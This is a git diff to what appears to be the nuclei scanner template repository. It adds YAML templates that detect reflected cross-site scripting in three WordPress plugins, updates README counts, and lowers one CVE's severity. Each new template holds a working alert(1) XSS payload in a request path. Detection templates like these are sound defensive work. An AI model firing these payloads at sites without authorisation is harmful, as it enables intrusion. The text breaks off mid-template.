diff --git a/README.md b/README.md
index 489624b800..98355cc94c 100644
--- a/README.md
+++ b/README.md
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- |
-| cves | 388 | vulnerabilities | 214 | exposed-panels | 192 |
+| cves | 394 | vulnerabilities | 216 | exposed-panels | 192 |
| takeovers | 70 | exposures | 112 | technologies | 115 |
| misconfiguration | 74 | workflows | 33 | miscellaneous | 27 |
| default-logins | 37 | file | 42 | dns | 10 |
| fuzzing | 10 | helpers | 9 | iot | 15 |
-**127 directories, 1465 files**.
+**127 directories, 1473 files**.
diff --git a/cves/2013/CVE-2013-3526.yaml b/cves/2013/CVE-2013-3526.yaml
new file mode 100644
index 0000000000..b081219b53
--- /dev/null
+++ b/cves/2013/CVE-2013-3526.yaml
@@ -0,0 +1,29 @@
+id: CVE-2013-3526
+
+info:
+ name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
+ tags: cve,cve2013,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml
new file mode 100644
index 0000000000..81ae8ce817
--- /dev/null
+++ b/cves/2014/CVE-2014-9094.yaml
@@ -0,0 +1,29 @@
+id: CVE-2014-9094
+
+info:
+ name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+ tags: cve,2014,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml
index 7da41d07b4..7322de0480 100644
--- a/cves/2017/CVE-2017-5487.yaml
+++ b/cves/2017/CVE-2017-5487.yaml
@@ -3,7 +3,7 @@ id: CVE-2017-5487
info:
name: WordPress Core < 4.7.1 - Username Enumeration
author: Manas_Harsh,daffainfo
- severity: medium
+ severity: info
description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
tags: cve,cve2017,wordpress
reference: |
diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml
new file mode 100644
index 0000000000..291551f948
--- /dev/null
+++ b/cves/2019/CVE-2019-14470.yaml
@@ -0,0 +1,31 @@
+id: CVE-2019-14470
+
+info:
+ name: WordPress Plugin UserPro 4.9.32 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://wpscan.com/vulnerability/9815
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
+ tags: cve,cve2019,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "